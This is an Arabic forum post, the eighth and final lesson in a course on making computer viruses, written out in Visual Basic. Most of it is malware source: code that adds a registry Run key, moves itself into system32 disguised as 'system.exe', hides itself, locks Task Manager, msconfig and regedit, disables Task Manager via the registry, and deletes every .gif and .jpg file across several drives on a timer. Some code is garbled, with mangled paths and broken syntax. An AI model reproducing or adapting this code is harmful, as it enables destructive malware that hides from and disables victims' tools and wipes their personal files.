منتدى البهجة
بسم الله الرحمان الرحيم
اهلا وسهلا بكم في منتدى البهجة

درس 8. إحتراف صنع فيروسات <الأخير>

استعرض الموضوع السابق استعرض الموضوع التالي اذهب الى الأسفل

درس 8. إحتراف صنع فيروسات <الأخير>

مُساهمة من طرف Admin في الثلاثاء أبريل 18, 2017 6:01 pm

هذا هو الدرس الآخير cheers lol!
إن شاء الله الجميع سوف يصبح محترفا
الدرس الثامن والاخير في الدورة


صناعة الفايروسات تحتاج الي ذكاء والي تفكير والي احتمالات
ذكاء يعني ذكاء الفايروس كيف يعمل ماذا يفعل كيف يحمي نفسه كيف يراوغ
تفكير اي فكر كيف تصنع فايروس قوي وذكي يصعب السيطره عليه
احتمالات تعني احتمال الضحيه يعمل فرومات يعني الفايروس رايح ينحذف طيب وين اخليه يتخبأ مثل ينسخ نفسه في الدي
اووووووووووه طيب افرض الضحيه فرمت حتى الدي ه لقيت فكره رائعه اخليه بنسخ نفسه في الفلاش مموري و القرص المرن وهكذا
طيب الفلاش مموري حرف القرص يتغير من جهاز الي جهاز ربما يكون g ربما يكون e ربما يكون حرف اخر
ماشي اعمل شفرة نسخ الي اكثر من حرف واحطه باداة تايمر مع وضع شفرة تخطى الاخطاء وهكذا
================================================== =======
الفكره هو ان يقوم الفايروس بنقل نفسه الي مجلد مهم في الجهاز ثم يغير اسمه الي اسم مهم مثل windows او system
او taskmagr وهكذا حاول ان تخلي اسمه يحسس الضحيه بانه تابع لنظام
وبعد ما يتمركز الفايروس في مجلد مهم يقوم بالخطوه الثاني وهي نسخ نفسه الي عدة مجلدات والي عدة محركات اقراص
مثل الدي والفلاش مموري والقرص المرن
================================================== =======
حماية الفايروس شي مهم جدا جدا حتى لايحذف
حماية الفايروس يجب ان نحميه مثل ماذكرت سابق من ثلاث برامج وهي ( قائمة المهام + الريجتسري + بدأ الشتغيل)
================================================== ========
دعونا الان نبدا بصناعة فايروس قوى جدا ومتعدد المهام
اولا يجب ان نضع هذه الشفرات في اجراء الفورم وهذا شي اساس لكل فايروس تصنعه لابد ان تضع هذه الشفرات في كل
مره تصنع فيها فايروس

كود PHP:
Private Sub Form_Load()
Set O = CreateObject("W******.****l")
O.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run\ProgramName", "c:\WINDOWS\system32\system.exe", "REG_SZ"
Form1.Hide
Name App.Path & "\" & App.EXEName & ".exe" As "c:WINDOWSsystem32system.exe"
SetAttr "c:WINDOWSsystem32system.exe", vbHidden
Open "C:WINDOWSsystem32taskmgr.exe" For Input Lock Read As 1
Open "C:WINDOWSpchealthhelpctrbinariesmsconfig.exe" For Input Lock Read As 1
Open "C:WINDOWSregedit.exe" For Input Lock Read As 1
End Sub
هذه الشفرات يجب ان تضعها في كل مره تصنع فيها فايروس وتحطها في اجراء الفورم
اول شفره تشغيل الفايروس مع تشغيل الجهاز
ثاني شفره قمنا باخفاء الفايروس اي النافذه
ثالث شفره قمنا بنقل الفايروس الي مجلد system32 وتغيير اسمه الي system ويعني الفايروس تمركز في هذا المجلد
رابع شفره تم اخفاء الفايروس اي اعطاءه خاصية التخفي
الشفره الخامسه والسادسه والسابعه حمينا الفايروس من برنامج قائمة المهام و بدا الشتغيل و الريجتسري
================================================== =======
هناك شفره تقوم بتعطيل قائمة المهام نهائيا وهي تتعامل مع الريجتسري اي تغير قيمة قائمة المهام الي 1 مما يجعلها تتعطل

كود PHP:
Const HKCU = &H80000001
Set objReg = GetObject("winmgmts:\\.\root\" & _
"Default:StdRegProv")
strKeyPath = "SoftwareMicrosoftWindowsCurrentVersionPoliciesSyst em"
objReg.Createkey HKCU, "SoftwareMicrosoftWindowsCurrentVersionPoliciesSyst em"
objReg.SetDwordValue HKCU, strKeyPath, "DisableTaskMgr", 1
هذه الشفره تقوم بتعطيل قائمة المهام لاحظ رقم واحد في اخر الشفره معناه تعطيل قائمة المهام وعندما تضغط على
ctrl+alt+del تظهر لك رساله من النظام تقول ان قائمة المهام معطله من قبل المسؤول
ولكن عندما تشيل رقم واحد وتحط صفر سوف تعمل قائمة المهام من جديد
هذه الشفره فقط تصلح لنظام اكس بي فقط
================================================== ===
الان دعونا نصنع اوامر الفايروس
اول امر للفايروس هو حذف الصور اللي بامتداد gif في جميع اركان الجهاز
ضع اداة تايمر وجعل العداد فيها يساوي 1000
ولا تنسى وضع textbox على الفروم ايضا
واكتب هذا الكود في اجراء التايمر

كود PHP:
Private Sub Timer1_Timer()
If Minute(Time) = 1 Then
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("d:\*.gif") <> "" Then
Kill "d:\*.gif"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("d:\*.jpg") <> "" Then
Kill "d:\*jpg"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("c:\*.jpg") <> "" Then
Kill "c:\*.jpg"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("c:\*.gif") <> "" Then
Kill "c:\*.gif"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("a:\*.gif") <> "" Then
Kill "a:\*.gif"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("a:\*.jpg") <> "" Then
Kill "a:\*.jpg"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("e:\*.gif") <> "" Then
Kill "e:\*.gif"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("e:\*.jpg") <> "" Then
Kill "e:\*.jpg"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("g:\*.gif") <> "" Then
Kill "g:\*.gif"
Else
Text1.Text = "QJgJI-pJLc "
ElseIf Dir("g:\*.jpg") <> "" Then
Kill "g:\*.jpg"
Else
End
End If
End Sub
End Sub
================================================== =======
دعونا نشرح الشفرات الطويله هذه رغم انها متشابهه لكن الاختلاف بمكان الحذف
If Minute(Time) = 1 Then
Text1.Text = "QJgJI-pJLc "
عندما تكون الساعه 1:1 و 2:1 و 3:1 و4:1 الي اخره قم بتنفيذ الشرط
Text1.Text = "QJgJI-pJLc " هذا شرط انا وضعته لسد الفراغ فقط يعني حيله برمجيه لان ملقيت شرط احطه
فاوضعت اكتب عالم الوله في التيسكت بوكس
حتى يقوم باكمال بقية الشروط اذا وضع عالم الوله في textbox يقوم باكمال بقية الشروط
======================================
ElseIf Dir("d:\*.gif") <> "" Then ابحث في الدي عن صور بامتداد gif اذا وجدها سوف ينفذ الشرط
Kill "d:\*.gif" قم بحذف الصور بامتداد if
Else حقق الشرط الثاني اذا لم يتحقق الشرط الاول وهو قم بوضع عالم الوله في التيكست بوكس
Text1.Text = "QJgJI-pJLc "
وبعدها يكمل بقية الشروط بدون اي اخطاء
==================================

كود PHP:
Private Sub Timer1_Timer()
On Error GoTo Cont:
If Minute(Time) = 1 Then
Kill "d:\*.gif"
Kill "d:\*jpg"
Kill "c:\*.gif"
Kill "c:\*.jpg"
Kill "e:\*.gif"
Kill "e:\*.jpg"
Kill "g:\*.gif"
Kill "g:\*.jpg"
End If
Cont:
End Sub
جرب هذا الكود افضل الاول فعلا فيه اخطاء ويحتاج الي تعديل
لاحظ في اخر شرط حطيت الشرط الثاني end اي سوف يتم ايقاف الفايروس
ولن يعمل الا في المره القادمه عند تشغيل الجهاز
avatar
Admin
Admin

المساهمات : 213
تاريخ التسجيل : 18/03/2017
العمر : 23

معاينة صفحة البيانات الشخصي للعضو http://charity1.yoo7.com

الرجوع الى أعلى الصفحة اذهب الى الأسفل

استعرض الموضوع السابق استعرض الموضوع التالي الرجوع الى أعلى الصفحة


 
صلاحيات هذا المنتدى:
لاتستطيع الرد على المواضيع في هذا المنتدى